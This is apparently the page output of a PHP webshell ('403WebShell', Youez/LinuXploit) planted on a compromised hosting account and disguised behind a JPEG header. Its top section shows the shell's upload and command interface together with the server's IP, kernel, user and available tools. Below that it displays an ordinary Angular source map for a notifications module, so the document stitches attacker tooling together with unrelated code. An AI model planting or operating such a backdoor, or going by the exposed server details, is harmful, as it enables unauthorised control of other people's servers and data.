����JFIF��x�x����'403WebShell
403Webshell
Server IP : 78.140.185.180  /  Your IP : 216.73.216.169
Web Server : LiteSpeed
System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : builderbox ( 1072)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/thread-self/root/home/builderbox/./././www/public/client/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/thread-self/root/home/builderbox/./././www/public/client//11-es5.1f39cc284895aedaa550.js.map
{"version":3,"sources":["webpack:///src/common/notifications/notification-subscriptions/notification-subscriptions.service.ts","webpack:///src/common/notifications/notification-subscriptions/notification-subscriptions.component.html","webpack:///src/common/notifications/notification-subscriptions/notification-subscriptions.component.ts","webpack:///src/common/notifications/notification-subscriptions/notification-subscriptions-resolver.service.ts","webpack:///src/common/shared/pagination-widget/pagination-widget.component.html","webpack:///src/common/shared/pagination-widget/pagination-widget.component.ts","webpack:///src/common/notifications/notification-page/notification-page.component.ts","webpack:///src/common/notifications/notifications-routing.module.ts","webpack:///src/common/notifications/notifications.module.ts","webpack:///src/common/shared/pagination-widget/pagination-widget.module.ts","webpack:///src/common/notifications/notification-page/notification-page.component.html"],"names":["NotificationSubscriptionsService","http","userId","this","get","selections","put","$event","stopPropagation","NotificationSubscriptionsComponent","NotificationSubscriptionsResolverService","route","api","currentUser","toast","cd","settings","loading$","BehaviorSubject","supportsBrowserNotifications","window","availableChannels","allNotifIds","data","subscribe","subscriptions","available_channels","all_notif_ids","forEach","channelName","Notification","permission","bindToBrowserNotifSubscription","allRowsSelectedFor","clear","select","selected","length","next","payload","getPayload","updateUserSubscriptions","pipe","finalize","open","Object","keys","browser","changed","delay","e","added","removed","markForCheck","requestPermission","then","saveSettings","router","state","getAll","catchError","navigate","mergeMap","response","of","PaginationWidgetComponent","NotificationPageComponent","NotificationsRoutingModule","NotificationsModule","PaginationWidgetModule","pageChanged","disabled","page","currentPage","queryParams","replaceUrl","newPage","selectPage","numberOfPages","value","last_page","iterator","Array","from","map","n","current_page","prevPage","nextPage","routes","path","component","notifications","breakpoints","pagination$","loadPage","snapshot","load","perPage","pagination","markedNotif","find","id","read_at","markAsRead","resolve","permissions","forChild"],"mappings":"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","file":"x","sourcesContent":["import {Injectable} from '@angular/core';\nimport {AppHttpClient} from '@common/core/http/app-http-client.service';\nimport {BackendResponse} from '@common/core/types/backend-response';\nimport {\n    NotificationSubscriptionGroup,\n    NotificationSubscriptionsResponse\n} from '@common/notifications/notification-subscriptions/notification-subscription';\n\nexport interface UpdateNotificationSubscriptionsPayload {\n    [key: string]: string[];\n}\n\n@Injectable({\n    providedIn: 'root'\n})\nexport class NotificationSubscriptionsService {\n    constructor(private http: AppHttpClient) {}\n\n    public getAll(userId: number): BackendResponse<NotificationSubscriptionsResponse> {\n        return this.http.get(`notifications/${userId}/subscriptions`);\n    }\n\n    public updateUserSubscriptions(userId: number, selections: UpdateNotificationSubscriptionsPayload): BackendResponse<void> {\n        return this.http.put(`notifications/${userId}/subscriptions`, {selections});\n    }\n}\n","<material-navbar [menuPosition]=\"settings.get('vebto.navbar.defaultPosition')\" class=\"box-shadow\"></material-navbar>\n\n<div class=\"be-container\">\n    <form class=\"table material-panel\" (ngSubmit)=\"saveSettings()\">\n        <div class=\"setting-group\" *ngFor=\"let group of subscriptions; let first = first\">\n            <div class=\"row\">\n                <div class=\"name-column strong\" trans>{{group.group_name}}</div>\n                <ng-container *ngIf=\"first\">\n                    <div class=\"channel-column\" *ngFor=\"let channelName of availableChannels\">\n                        <div class=\"channel-name\" trans>{{channelName}}</div>\n                        <mat-checkbox (change)=\"$event ? toggleAllRowsFor(channelName) : null\"\n                                      [checked]=\"allRowsSelectedFor(channelName)\"\n                                      [indeterminate]=\"selections[channelName].hasValue() && !allRowsSelectedFor(channelName)\"\n                                      [disabled]=\"channelName === 'browser' && !supportsBrowserNotifications\">\n                        </mat-checkbox>\n                    </div>\n                </ng-container>\n            </div>\n            <div class=\"row indent\" *ngFor=\"let setting of group.subscriptions; let last = last\" [class.no-border]=\"last\">\n                <div class=\"name-column\" trans>{{setting.name}}</div>\n                <div class=\"channel-column\" *ngFor=\"let channelName of availableChannels\">\n                    <mat-checkbox (click)=\"$event.stopPropagation()\"\n                                  (change)=\"$event ? this.selections[channelName].toggle(setting.notif_id) : null\"\n                                  [checked]=\"selections[channelName].isSelected(setting.notif_id)\"\n                                  [disabled]=\"channelName === 'browser' && !supportsBrowserNotifications\">\n                    </mat-checkbox>\n                </div>\n            </div>\n        </div>\n\n        <button mat-raised-button color=\"accent\" class=\"submit-button\" [disabled]=\"loading$ | async\" trans>Save Settings</button>\n    </form>\n</div>\n","import {ChangeDetectionStrategy, ChangeDetectorRef, Component, OnInit} from '@angular/core';\nimport {ActivatedRoute} from '@angular/router';\nimport {\n    NotificationSubscriptionGroup,\n    NotificationSubscriptionsResponse\n} from '@common/notifications/notification-subscriptions/notification-subscription';\nimport {\n    NotificationSubscriptionsService,\n    UpdateNotificationSubscriptionsPayload\n} from '@common/notifications/notification-subscriptions/notification-subscriptions.service';\nimport {CurrentUser} from '@common/auth/current-user';\nimport {Toast} from '@common/core/ui/toast.service';\nimport {BehaviorSubject} from 'rxjs';\nimport {delay, finalize} from 'rxjs/operators';\nimport {SelectionModel} from '@angular/cdk/collections';\nimport {Settings} from '@common/core/config/settings.service';\n\n@Component({\n    selector: 'notification-subscriptions',\n    templateUrl: './notification-subscriptions.component.html',\n    styleUrls: ['./notification-subscriptions.component.scss'],\n    changeDetection: ChangeDetectionStrategy.OnPush\n})\nexport class NotificationSubscriptionsComponent implements OnInit {\n    public subscriptions: NotificationSubscriptionGroup[];\n    public loading$ = new BehaviorSubject<boolean>(false);\n    public supportsBrowserNotifications = ('Notification' in window);\n    public availableChannels: string[] = [];\n    public selections: {[key: string]: SelectionModel<string>} = {};\n    public allNotifIds: string[] = [];\n\n    constructor(\n        private route: ActivatedRoute,\n        private api: NotificationSubscriptionsService,\n        private currentUser: CurrentUser,\n        private toast: Toast,\n        private cd: ChangeDetectorRef,\n        public settings: Settings,\n    ) {}\n\n    ngOnInit() {\n        this.route.data.subscribe((data: {api: NotificationSubscriptionsResponse}) => {\n            this.subscriptions = data.api.subscriptions;\n            this.availableChannels = data.api.available_channels;\n            this.allNotifIds = data.api.all_notif_ids;\n            this.availableChannels.forEach(channelName => {\n                this.selections[channelName] = new SelectionModel(true, data.api.selections[channelName]);\n            });\n        });\n\n        if (Notification.permission !== 'granted') {\n            this.bindToBrowserNotifSubscription();\n        }\n    }\n\n    public toggleAllRowsFor(channelName: string) {\n        this.allRowsSelectedFor(channelName) ?\n            this.selections[channelName].clear() :\n            this.selections[channelName].select(...this.allNotifIds);\n    }\n\n    public allRowsSelectedFor(channelName: string): boolean {\n        return this.selections[channelName].selected.length === this.allNotifIds.length;\n    }\n\n    public saveSettings() {\n        this.loading$.next(true);\n        const payload = this.getPayload();\n        this.api.updateUserSubscriptions(this.currentUser.get('id'), payload)\n            .pipe(finalize(() => this.loading$.next(false)))\n            .subscribe(() => {\n                this.toast.open('Notification settings updated.');\n            });\n    }\n\n    private getPayload(): UpdateNotificationSubscriptionsPayload {\n        const payload = {};\n        Object.keys(this.selections).forEach(channelName => {\n            payload[channelName] = this.selections[channelName].selected;\n        });\n        return payload;\n    }\n\n    private bindToBrowserNotifSubscription() {\n        this.selections.browser.changed\n            .pipe(delay(1))\n            .subscribe(e => {\n                if (e.added.length && !e.removed.length) {\n                    if (Notification.permission === 'denied') {\n                        this.toast.open('Notifications blocked. Please enable them for this site from browser settings.');\n                        this.selections.browser.clear();\n                        this.cd.markForCheck();\n                    } else {\n                        Notification.requestPermission().then(permission => {\n                            if (permission !== 'granted') {\n                                this.selections.browser.clear();\n                                this.cd.markForCheck();\n                            }\n                        });\n                    }\n                }\n            });\n    }\n}\n","import {Injectable} from '@angular/core';\r\nimport {ActivatedRouteSnapshot, Resolve, Router, RouterStateSnapshot} from '@angular/router';\r\nimport {catchError, mergeMap} from 'rxjs/operators';\r\nimport {EMPTY, Observable, of} from 'rxjs';\r\nimport {NotificationSubscriptionsService} from '@common/notifications/notification-subscriptions/notification-subscriptions.service';\r\nimport {CurrentUser} from '@common/auth/current-user';\r\nimport {NotificationSubscriptionsResponse} from '@common/notifications/notification-subscriptions/notification-subscription';\r\n\r\n@Injectable({\r\n    providedIn: 'root'\r\n})\r\nexport class NotificationSubscriptionsResolverService implements Resolve<Observable<NotificationSubscriptionsResponse>> {\r\n    constructor(\r\n        private router: Router,\r\n        private subscriptions: NotificationSubscriptionsService,\r\n        private currentUser: CurrentUser,\r\n    ) {}\r\n\r\n    resolve(route: ActivatedRouteSnapshot, state: RouterStateSnapshot): Observable<NotificationSubscriptionsResponse> {\r\n        return this.subscriptions.getAll(+this.currentUser.get('id')).pipe(\r\n            catchError(() => {\r\n                this.router.navigate(['/account/settings']);\r\n                return EMPTY; //\r\n            }),\r\n            mergeMap(response => {\r\n                if (response) {\r\n                    return of(response);\r\n                } else {\r\n                    this.router.navigate(['/account/settings']);\r\n                    return EMPTY;\r\n                }\r\n            })\r\n        );\r\n    }\r\n}\r\n","<ul class=\"page-numbers unstyled-list\">\n    <li>\n        <button type=\"button\" class=\"prev\" [disabled]=\"disabled\" (click)=\"prevPage()\" mat-button trans>Previous</button>\n    </li>\n    <li *ngFor=\"let page of iterator\">\n        <button type=\"button\" class=\"page-number-button\" [disabled]=\"disabled\" [class.active]=\"currentPage === page\" (click)=\"selectPage(page)\" mat-flat-button color=\"gray\">{{page}}</button>\n    </li>\n    <li>\n        <button type=\"button\" class=\"next\" [disabled]=\"disabled\" (click)=\"nextPage()\" mat-button trans>Next</button>\n    </li>\n</ul>\n","import {ChangeDetectionStrategy, Component, EventEmitter, HostBinding, Input, Output} from '@angular/core';\nimport {PaginationResponse} from '@common/core/types/pagination/pagination-response';\nimport {Router} from '@angular/router';\n\n@Component({\n    selector: 'pagination-widget',\n    templateUrl: './pagination-widget.component.html',\n    styleUrls: ['./pagination-widget.component.scss'],\n    changeDetection: ChangeDetectionStrategy.OnPush\n})\nexport class PaginationWidgetComponent {\n    private numberOfPages: number;\n    public iterator: number[];\n    public currentPage: number;\n\n    @HostBinding('class.hidden') get shouldHide() {\n        return this.numberOfPages < 2;\n    }\n\n    @Output() pageChanged = new EventEmitter<number>();\n\n    @Input() disabled = true;\n    @Input() set pagination(value: PaginationResponse<any>) {\n        if (value) {\n            this.numberOfPages = value.last_page > 10 ? 10 : value.last_page;\n            if (this.numberOfPages > 1) {\n                this.iterator = Array.from(Array(this.numberOfPages).keys()).map(n => n + 1);\n                this.currentPage = value.current_page;\n            }\n        }\n    }\n\n    constructor(private router: Router) {}\n\n    public selectPage(page: number) {\n        if (this.currentPage !== page) {\n            this.currentPage = page;\n            this.pageChanged.next(page);\n            this.router.navigate([], {queryParams: {page}, replaceUrl: true});\n        }\n    }\n\n    public nextPage() {\n        const newPage = this.currentPage + 1;\n        this.selectPage(newPage <= this.numberOfPages ? newPage : this.currentPage);\n    }\n\n    public prevPage() {\n        const newPage = this.currentPage - 1;\n        this.selectPage(newPage >= 1 ? newPage : this.currentPage);\n    }\n}\n","import {Component, OnInit, ChangeDetectionStrategy} from '@angular/core';\nimport {Settings} from '@common/core/config/settings.service';\nimport {NotificationService} from '@common/notifications/notification-list/notification.service';\nimport {BreakpointsService} from '@common/core/ui/breakpoints.service';\nimport {ActivatedRoute} from '@angular/router';\nimport {BehaviorSubject} from 'rxjs';\nimport {PaginationResponse} from '@common/core/types/pagination/pagination-response';\nimport {DatabaseNotification} from '@common/notifications/database-notification';\n\n@Component({\n    selector: 'notification-page',\n    templateUrl: './notification-page.component.html',\n    styleUrls: ['./notification-page.component.scss'],\n    changeDetection: ChangeDetectionStrategy.OnPush\n})\nexport class NotificationPageComponent implements OnInit {\n    public pagination$ = new BehaviorSubject<PaginationResponse<DatabaseNotification>>(null);\n\n    constructor(\n        public settings: Settings,\n        public notifications: NotificationService,\n        public breakpoints: BreakpointsService,\n        private route: ActivatedRoute,\n    ) {}\n\n    ngOnInit() {\n        this.loadPage(this.route.snapshot.queryParams.page || 1);\n    }\n\n    public loadPage(page: number) {\n        this.notifications.load({page, perPage: 25})\n            .subscribe(response => {\n                this.pagination$.next(response.pagination);\n            });\n    }\n\n    public markAsRead(markedNotif: DatabaseNotification) {\n        const notification = this.pagination$.value.data.find(n => n.id === markedNotif.id);\n        notification.read_at = markedNotif.read_at;\n    }\n}\n","import {NgModule} from '@angular/core';\nimport {Routes, RouterModule} from '@angular/router';\nimport {NotificationSubscriptionsComponent} from './notification-subscriptions/notification-subscriptions.component';\nimport {NotificationSubscriptionsResolverService} from './notification-subscriptions/notification-subscriptions-resolver.service';\nimport {NotificationPageComponent} from '@common/notifications/notification-page/notification-page.component';\n\n\nconst routes: Routes = [\n    {\n        path: '',\n        component: NotificationPageComponent,\n    },\n    {\n        path: 'settings',\n        component: NotificationSubscriptionsComponent,\n        resolve: {api: NotificationSubscriptionsResolverService},\n        data: {permissions: ['notification.subscribe']},\n    }\n];\n\n@NgModule({\n    imports: [RouterModule.forChild(routes)],\n    exports: [RouterModule]\n})\nexport class NotificationsRoutingModule {\n}\n","import { NgModule } from '@angular/core';\nimport { CommonModule } from '@angular/common';\nimport { NotificationsRoutingModule } from './notifications-routing.module';\nimport { NotificationSubscriptionsComponent } from './notification-subscriptions/notification-subscriptions.component';\nimport { MatCheckboxModule } from '@angular/material/checkbox';\nimport { ImageOrIconModule } from '@common/core/ui/image-or-icon/image-or-icon.module';\nimport { NotificationListModule } from '@common/notifications/notification-list/notification-list.module';\nimport { MaterialNavbarModule } from '@common/core/ui/material-navbar/material-navbar.module';\nimport { NotificationPageComponent } from './notification-page/notification-page.component';\nimport {PaginationWidgetModule} from '@common/shared/pagination-widget/pagination-widget.module';\nimport {MatButtonModule} from '@angular/material/button';\nimport {FormsModule, ReactiveFormsModule} from '@angular/forms';\n\n\n@NgModule({\n    declarations: [\n        NotificationSubscriptionsComponent,\n        NotificationPageComponent,\n    ],\n    imports: [\n        CommonModule,\n        FormsModule,\n        ReactiveFormsModule,\n        NotificationsRoutingModule,\n        MaterialNavbarModule,\n        ImageOrIconModule,\n        NotificationListModule,\n        PaginationWidgetModule,\n\n        // material\n        MatCheckboxModule,\n        MatButtonModule,\n    ]\n})\nexport class NotificationsModule {\n}\n","import {NgModule} from '@angular/core';\nimport {CommonModule} from '@angular/common';\nimport {PaginationWidgetComponent} from '@common/shared/pagination-widget/pagination-widget.component';\nimport { MatButtonModule } from '@angular/material/button';\nimport {TranslationsModule} from '@common/core/translations/translations.module';\n\n\n@NgModule({\n    declarations: [\n        PaginationWidgetComponent,\n    ],\n    imports: [\n        CommonModule,\n        MatButtonModule,\n        TranslationsModule,\n    ],\n    exports: [\n        PaginationWidgetComponent,\n    ]\n})\nexport class PaginationWidgetModule {\n}\n","<material-navbar [menuPosition]=\"settings.get('vebto.navbar.defaultPosition')\"></material-navbar>\n<div class=\"be-container\">\n    <notification-list [notifications]=\"(pagination$ | async)?.data\" [compact]=\"breakpoints.isMobile$ | async\" (markedAsRead)=\"markAsRead($event)\"></notification-list>\n    <pagination-widget [pagination]=\"pagination$ | async\" [disabled]=\"notifications.loading$ | async\" (pageChanged)=\"loadPage($event)\"></pagination-widget>\n</div>\n"]}

Youez - 2016 - github.com/yon3zu
LinuXploit